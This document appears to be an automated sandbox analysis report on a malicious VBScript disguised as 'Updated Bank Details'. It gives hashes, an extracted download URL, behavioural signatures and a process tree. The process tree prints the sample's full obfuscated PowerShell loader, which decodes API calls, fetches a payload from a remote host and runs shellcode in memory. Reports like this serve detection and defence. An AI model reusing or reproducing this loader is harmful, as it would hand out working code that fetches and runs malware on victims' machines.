Analysis
max time kernel: 146s
max time network: 149s
platform: windows7_x64
resource: win7-20221111-en
resource tags: arch:x64, arch:x86, image:win7-20221111-en, locale:en-us, os:windows7-x64, system
submitted: 07-02-2023 10:45
Static task
static1
Behavioral task
behavioral1
Sample
Updated Bank Details.vbs
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
Updated Bank Details.vbs
Resource
win10v2004-20220812-en
General
-
Target
Updated Bank Details.vbs
-
Size
132KB
-
MD5
a2b56b456dab2c7ea6e07bdaf0be06f6
-
SHA1
942931bbaa2568824208c4d3abbb8ab1b9e9579f
-
SHA256
87a850093290a5a1cb984c05986abaaea4b135370e892c75b369a37273021bcc
-
SHA512
d853f43575bbd90c5d674f581af2ea021a6355cff8401d729ca01c96950b6a1b76207fd87d0997c07dc15e1295feab995c144099e2ae475875c5029f5b5b4b44
-
SSDEEP
3072:vTHJmOSfNKUTvt3UXHRTjwaYxgLKyaJLjQQwMBF+8n8YGYiw1Nbr:vTcDf0+axTE9CKrQQwmOYfH
Malware Config
Extracted
https://megookbpnq.cf/herpetici.afm
Signatures
-
Blocklisted process makes network request 46 IoCs
Processes:
flow  pid  process
4  780  powershell.exe
5  780  powershell.exe
6  780  powershell.exe
7  780  powershell.exe
8  780  powershell.exe
9  780  powershell.exe
11  780  powershell.exe
12  780  powershell.exe
13  780  powershell.exe
14  780  powershell.exe
15  780  powershell.exe
16  780  powershell.exe
17  780  powershell.exe
18  780  powershell.exe
19  780  powershell.exe
20  780  powershell.exe
21  780  powershell.exe
22  780  powershell.exe
23  780  powershell.exe
24  780  powershell.exe
25  780  powershell.exe
26  780  powershell.exe
27  780  powershell.exe
28  780  powershell.exe
29  780  powershell.exe
30  780  powershell.exe
31  780  powershell.exe
32  780  powershell.exe
33  780  powershell.exe
34  780  powershell.exe
35  780  powershell.exe
36  780  powershell.exe
37  780  powershell.exe
38  780  powershell.exe
39  780  powershell.exe
40  780  powershell.exe
41  780  powershell.exe
42  780  powershell.exe
43  780  powershell.exe
44  780  powershell.exe
45  780  powershell.exe
46  780  powershell.exe
47  780  powershell.exe
48  780  powershell.exe
49  780  powershell.exe
50  780  powershell.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
Processes:
pid  process
956  ipconfig.exe
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
pid  process
1076  powershell.exe
780  powershell.exe
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
description  pid  process
Token: SeDebugPrivilege  1076  powershell.exe
Token: SeDebugPrivilege  780  powershell.exe
-
Suspicious use of WriteProcessMemory 13 IoCs
Processes:
description  pid  process  target process
PID 1996 wrote to memory of 956  1996  WScript.exe  ipconfig.exe
PID 1996 wrote to memory of 956  1996  WScript.exe  ipconfig.exe
PID 1996 wrote to memory of 956  1996  WScript.exe  ipconfig.exe
PID 1996 wrote to memory of 876  1996  WScript.exe  cmd.exe
PID 1996 wrote to memory of 876  1996  WScript.exe  cmd.exe
PID 1996 wrote to memory of 876  1996  WScript.exe  cmd.exe
PID 1996 wrote to memory of 1076  1996  WScript.exe  powershell.exe
PID 1996 wrote to memory of 1076  1996  WScript.exe  powershell.exe
PID 1996 wrote to memory of 1076  1996  WScript.exe  powershell.exe
PID 1076 wrote to memory of 780  1076  powershell.exe  powershell.exe
PID 1076 wrote to memory of 780  1076  powershell.exe  powershell.exe
PID 1076 wrote to memory of 780  1076  powershell.exe  powershell.exe
PID 1076 wrote to memory of 780  1076  powershell.exe  powershell.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Updated Bank Details.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:1996 -
C:\Windows\System32\ipconfig.exeipconfig /flushdns2⤵
- Gathers network information
PID:956 -
C:\Windows\System32\cmd.execmd /c echo shell2⤵PID:876
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Chester = """[...]""";Function Forhan9 { param([String]$Amoralite); For($Valsa=2; $Valsa -lt $Amoralite.Length-1; $Valsa+=(2+1)){$Koic = $Koic + $Amoralite.Substring($Valsa, 1)}; $Koic;}$Talomr0 = Forhan9 'MiITaESpXPe ';$Talomr1= Forhan9 $Chester;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Talomr1 ;}else{&$Talomr0 $Talomr1;}"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1076 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$Amoralite); $Corsos = ''; Write-Host $Corsos; Write-Host $Corsos; Write-Host $Corsos; $smedemestr = New-Object byte[] ($Amoralite.Length / 2); For($Valsa=0; $Valsa -lt $Amoralite.Length; $Valsa+=2){ $smedemestr[$Valsa/2] = [convert]::ToByte($Amoralite.Substring($Valsa, 2), 16); $smedemestr[$Valsa/2] = ($smedemestr[$Valsa/2] -bxor 25); } [String][System.Text.Encoding]::ASCII.GetString($smedemestr);}$Udsalgsvar0=HTB '4A606A6D7C74377D7575';$Udsalgsvar1=HTB '54707A6B766A767F6D374E70772A2B374C776A787F7C57786D706F7C547C6D71767D6A';$Udsalgsvar2=HTB '5E7C6D496B767A587D7D6B7C6A6A';$Udsalgsvar3=HTB '4A606A6D7C74374B6C776D70747C3750776D7C6B76694A7C6B6F707A7C6A375178777D757C4B7C7F';$Udsalgsvar4=HTB '6A6D6B70777E';$Udsalgsvar5=HTB '5E7C6D54767D6C757C5178777D757C';$Udsalgsvar6=HTB '4B4D4A697C7A7078755778747C353951707D7C5B604A707E3539496C7B75707A';$Udsalgsvar7=HTB '4B6C776D70747C3539547877787E7C7D';$Udsalgsvar8=HTB '4B7C7F757C7A6D7C7D5D7C757C7E786D7C';$Udsalgsvar9=HTB '5077547C74766B6054767D6C757C';$Skelvy0=HTB '54605D7C757C7E786D7C4D60697C';$Skelvy1=HTB '5A75786A6A3539496C7B75707A35394A7C78757C7D353958776A705A75786A6A3539586C6D765A75786A6A';$Skelvy2=HTB '50776F76727C';$Skelvy3=HTB '496C7B75707A353951707D7C5B604A707E3539577C6E4A75766D35394F706B6D6C7875';$Skelvy4=HTB '4F706B6D6C7875587575767A';$Skelvy5=HTB '776D7D7575';$Skelvy6=HTB '576D496B766D7C7A6D4F706B6D6C7875547C74766B60';$Skelvy7=HTB '505C41';$Skelvy8=HTB '45';$Samle=HTB '4C4A5C4B2A2B';$Tale=HTB '5A7875754E70777D766E496B767A58';function fkp {Param ($dugpunk, $Totingkata) ;$Superi0 =HTB 
'3D4A697D7C72787539243931425869695D76747870774423235A6C6B6B7C776D5D7674787077375E7C6D586A6A7C747B75707C6A31303965394E717C6B7C34567B737C7A6D3962393D46375E75767B7875586A6A7C747B75605A787A717C393458777D393D463755767A786D707677374A6975706D313D4A727C756F60213042342844375C686C78756A313D4C7D6A78757E6A6F786B2930396430375E7C6D4D60697C313D4C7D6A78757E6A6F786B2830';&($Skelvy7) $Superi0;$Superi5 = HTB '3D4D7C6B6D7078776A3924393D4A697D7C727875375E7C6D547C6D71767D313D4C7D6A78757E6A6F786B2B3539424D60697C4244443959313D4C7D6A78757E6A6F786B2A35393D4C7D6A78757E6A6F786B2D3030';&($Skelvy7) $Superi5;$Superi1 = HTB '6B7C6D6C6B77393D4D7C6B6D7078776A3750776F76727C313D776C757535395931424A606A6D7C74374B6C776D70747C3750776D7C6B76694A7C6B6F707A7C6A375178777D757C4B7C7F4431577C6E34567B737C7A6D394A606A6D7C74374B6C776D70747C3750776D7C6B76694A7C6B6F707A7C6A375178777D757C4B7C7F3131577C6E34567B737C7A6D3950776D496D6B303539313D4A697D7C727875375E7C6D547C6D71767D313D4C7D6A78757E6A6F786B2C30303750776F76727C313D776C7575353959313D7D6C7E696C77723030303035393D4D766D70777E72786D783030';&($Skelvy7) $Superi1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Cosmonau,[Parameter(Position = 1)] [Type] $Chuckl = [Void]);$Superi2 = HTB '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';&($Skelvy7) $Superi2;$Superi3 = HTB '3D70777F75766E7B75766E375D7C7F70777C5A76776A6D6B6C7A6D766B313D4C7D6A78757E6A6F786B2F3539424A606A6D7C74374B7C7F757C7A6D707677375A78757570777E5A76776F7C776D7076776A4423234A6D78777D786B7D35393D5A766A747677786C30374A7C6D507469757C747C776D786D7076775F75787E6A313D4C7D6A78757E6A6F786B2E30';&($Skelvy7) $Superi3;$Superi4 = HTB '3D70777F75766E7B75766E375D7C7F70777C547C6D71767D313D4A727C756F602B35393D4A727C756F602A35393D5A716C7A727535393D5A766A747677786C30374A7C6D507469757C747C776D786D7076775F75787E6A313D4C7D6A78757E6A6F786B2E30';&($Skelvy7) $Superi4;$Superi5 = HTB '6B7C6D6C6B77393D70777F75766E7B75766E375A6B7C786D7C4D60697C3130';&($Skelvy7) $Superi5 ;}$Sulphur = HTB 
'727C6B777C752A2B';$Superi6 = HTB '3D5D7C6A766B70392439424A606A6D7C74374B6C776D70747C3750776D7C6B76694A7C6B6F707A7C6A3754786B6A7178754423235E7C6D5D7C757C7E786D7C5F766B5F6C777A6D707677497670776D7C6B31317F7269393D4A6C7569716C6B393D4A727C756F602D303539315E5D4D3959314250776D496D6B443539424C50776D2A2B443539424C50776D2A2B443539424C50776D2A2B443039314250776D496D6B44303030';&($Skelvy7) $Superi6;$Arbal = fkp $Skelvy5 $Skelvy6;$Superi7 = HTB '3D50776F7875702A3924393D5D7C6A766B703750776F76727C314250776D496D6B442323437C6B7635392F2F29353929612A292929353929612D2930';&($Skelvy7) $Superi7;$Superi8 = HTB '3D527674743924393D5D7C6A766B703750776F76727C314250776D496D6B442323437C6B7635392A2121292C2C292D353929612A292929353929612D30';&($Skelvy7) $Superi8;$Koic01 = 'https://megookbpnq.cf/herpetici.afm';$Koic00 = HTB '3D5F766B71787739243931577C6E34567B737C7A6D39577C6D374E7C7B5A75707C776D30375D766E777576787D4A6D6B70777E313D5276707A292830';$Superi8 = HTB '3D50776F7875702B243D7C776F237869697D786D78';&($Skelvy7) $Superi8;$Invali2=$Invali2+'\Trbaa.dat';$Forhan='';if (-not(Test-Path $Invali2)) {while ($Forhan -eq '') {&($Skelvy7) $Koic00;Start-Sleep 5;}Set-Content $Invali2 $Forhan;}$Forhan = Get-Content $Invali2;$Superi9 = HTB '3D4A6C697C6B70392439424A606A6D7C74375A76776F7C6B6D4423235F6B76745B786A7C2F2D4A6D6B70777E313D5F766B71787730';&($Skelvy7) $Superi9;$Forhan0 = HTB '424A606A6D7C74374B6C776D70747C3750776D7C6B76694A7C6B6F707A7C6A3754786B6A7178754423235A766960313D4A6C697C6B703539293539393D50776F7875702A35392F2F2930';&($Skelvy7) $Forhan0;$Textuali=$Superi.count-660;$Forhan1 = HTB '424A606A6D7C74374B6C776D70747C3750776D7C6B76694A7C6B6F707A7C6A3754786B6A7178754423235A766960313D4A6C697C6B7035392F2F2935393D5276747435393D4D7C616D6C78757030';&($Skelvy7) $Forhan1;$Forhan2 = HTB 
'3D7F766B7B392439424A606A6D7C74374B6C776D70747C3750776D7C6B76694A7C6B6F707A7C6A3754786B6A7178754423235E7C6D5D7C757C7E786D7C5F766B5F6C777A6D707677497670776D7C6B31317F7269393D4A7874757C393D4D78757C303539315E5D4D3959314250776D496D6B4435394250776D496D6B4435394250776D496D6B4435394250776D496D6B4435394250776D496D6B443039314250776D496D6B44303030';&($Skelvy7) $Forhan2;$Forhan3 = HTB '3D7F766B7B3750776F76727C313D50776F7875702A353D52767474353D586B7B78753529352930';&($Skelvy7) $Forhan3#"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:780
Network
MITRE ATT&CK Enterprise v6
Downloads